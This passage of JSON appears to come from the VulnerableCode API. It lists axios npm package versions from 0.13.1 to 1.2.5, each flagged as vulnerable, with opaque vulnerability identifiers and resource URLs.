.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.13.1"},{"url":"http://public2.vulnerablecode.io/api/packages/186178?format=json","purl":"pkg:npm/axios@0.14.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.14.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186179?format=json","purl":"pkg:npm/axios@0.15.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.15.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186180?format=json","purl":"pkg:npm/axios@0.15.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.15.1"},{"url":"http://public2.vulnerablecode.io/api/packages/186181?format=json","purl":"pkg:npm/axios@0.15.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.15.2"},{"url":"http://public2.vulnerablecode.io/api/packages/186182?format=json","purl":"pkg:npm/axios@0.15.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.15.3"},{"url":"http://public2.vulnerablecode.io/api/packages/186183?format=json","purl":"pkg:npm/axios@0.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.16.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186184?format=json","purl":"pkg:npm/axios@0.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.16.1"},{"url":"http://public2.vulnerablecode.io/api/packages/186185?format=json","purl":"pkg:npm/axios@0.16.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.16.2"},{"url":"http://public2.vulnerablecode.io/api/packages/186186?format=json","purl":"pkg:npm/axios@0.17.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.17.0"},{"url":"http://public2.vulnerablecode.io/api/packages/186187?format=json","purl":"pkg:npm/axios@0.17.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.17.1"},{"url":"http://public2.vulnerablecode.io/api/packages/36440?format=json","purl":"pkg:npm/axios@0.18.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5b5u-3ngh-4fd9"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.18.0"},{"url":"http://public2.vulnerablecode.io/api/packages/36441?format=json","purl":"pkg:npm/axios@0.18.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.18.1"},{"url":"http://public2.vulnerablecode.io/api/packages/186188?format=json","purl":"pkg:npm/axios@0.19.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.19.0-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/219377?format=json","purl":"pkg:npm/axios@0.19.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-xtpz-6f5t-t3ev"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.19.0"},{"url":"http://public2.vulnerablecode.io/api/packages/219378?format=json","purl":"pkg:npm/axios@0.19.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-xtpz-6f5t-t3ev"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.19.1"},{"url":"http://public2.vulnerablecode.io/api/packages/219379?format=json","purl":"pkg:npm/axios@0.19.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-xtpz-6f5t-t3ev"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.19.2"},{"url":"http://public2.vulnerablecode.io/api/packages/219380?format=json","purl":"pkg:npm/axios@0.20.0-0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-xtpz-6f5t-t3ev"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.20.0-0"},{"url":"http://public2.vulnerablecode.io/api/packages/219381?format=json","purl":"pkg:npm/axios@0.20.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-xtpz-6f5t-t3ev"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.20.0"},{"url":"http://public2.vulnerablecode.io/api/packages/219382?format=json","purl":"pkg:npm/axios@0.21.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-xtpz-6f5t-t3ev"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.21.0"},{"url":"http://public2.vulnerablecode.io/api/packages/39224?format=json","purl":"pkg:npm/axios@0.21.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-n89f-3nkb-ebg3"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.21.1"},{"url":"http://public2.vulnerablecode.io/api/packages/39225?format=json","purl":"pkg:npm/axios@0.21.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.21.2"},{"url":"http://public2.vulnerablecode.io/api/packages/631899?format=json","purl":"pkg:npm/axios@0.21.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.21.3"},{"url":"http://public2.vulnerablecode.io/api/packages/631900?format=json","purl":"pkg:npm/axios@0.21.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.21.4"},{"url":"http://public2.vulnerablecode.io/api/packages/631901?format=json","purl":"pkg:npm/axios@0.22.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.22.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631902?format=json","purl":"pkg:npm/axios@0.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.23.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631903?format=json","purl":"pkg:npm/axios@0.24.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.24.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631904?format=json","purl":"pkg:npm/axios@0.25.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.25.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631905?format=json","purl":"pkg:npm/axios@0.26.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.26.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631906?format=json","purl":"pkg:npm/axios@0.26.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.26.1"},{"url":"http://public2.vulnerablecode.io/api/packages/631907?format=json","purl":"pkg:npm/axios@0.27.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.27.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631908?format=json","purl":"pkg:npm/axios@0.27.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.27.1"},{"url":"http://public2.vulnerablecode.io/api/packages/631909?format=json","purl":"pkg:npm/axios@0.27.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.27.2"},{"url":"http://public2.vulnerablecode.io/api/packages/60988?format=json","purl":"pkg:npm/axios@0.28.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.28.0"},{"url":"http://public2.vulnerablecode.io/api/packages/751369?format=json","purl":"pkg:npm/axios@0.28.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.28.1"},{"url":"http://public2.vulnerablecode.io/api/packages/751370?format=json","purl":"pkg:npm/axios@0.29.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.29.0"},{"url":"http://public2.vulnerablecode.io/api/packages/70090?format=json","purl":"pkg:npm/axios@0.30.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.30.0"},{"url":"http://public2.vulnerablecode.io/api/packages/808089?format=json","purl":"pkg:npm/axios@0.30.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.30.1"},{"url":"http://public2.vulnerablecode.io/api/packages/68902?format=json","purl":"pkg:npm/axios@0.30.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.30.2"},{"url":"http://public2.vulnerablecode.io/api/packages/62854?format=json","purl":"pkg:npm/axios@0.30.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.30.3"},{"url":"http://public2.vulnerablecode.io/api/packages/60986?format=json","purl":"pkg:npm/axios@1.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-rqj4-k4np-f7f8"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerability":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-x41s-g5mh-pkdq"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.0.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631911?format=json","purl":"pkg:npm/axios@1.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.1.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631912?format=json","purl":"pkg:npm/axios@1.1.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.1.1"},{"url":"http://public2.vulnerablecode.io/api/packages/631913?format=json","purl":"pkg:npm/axios@1.1.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.1.2"},{"url":"http://public2.vulnerablecode.io/api/packages/631914?format=json","purl":"pkg:npm/axios@1.1.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.1.3"},{"url":"http://public2.vulnerablecode.io/api/packages/631915?format=json","purl":"pkg:npm/axios@1.2.0-alpha.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.2.0-alpha.1"},{"url":"http://public2.vulnerablecode.io/api/packages/631916?format=json","purl":"pkg:npm/axios@1.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.2.0"},{"url":"http://public2.vulnerablecode.io/api/packages/631917?format=json","purl":"pkg:npm/axios@1.2.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.2.1"},{"url":"http://public2.vulnerablecode.io/api/packages/631918?format=json","purl":"pkg:npm/axios@1.2.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.2.2"},{"url":"http://public2.vulnerablecode.io/api/packages/631919?format=json","purl":"pkg:npm/axios@1.2.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.2.3"},{"url":"http://public2.vulnerablecode.io/api/packages/631920?format=json","purl":"pkg:npm/axios@1.2.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.2.4"},{"url":"http://public2.vulnerablecode.io/api/packages/631921?format=json","purl":"pkg:npm/axios@1.2.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rdk-mw2k-eqdx"},{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-axk7-6q4b-vuga"},{"vulnerability":"VCID-ek49-tuj4-t3ap"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.i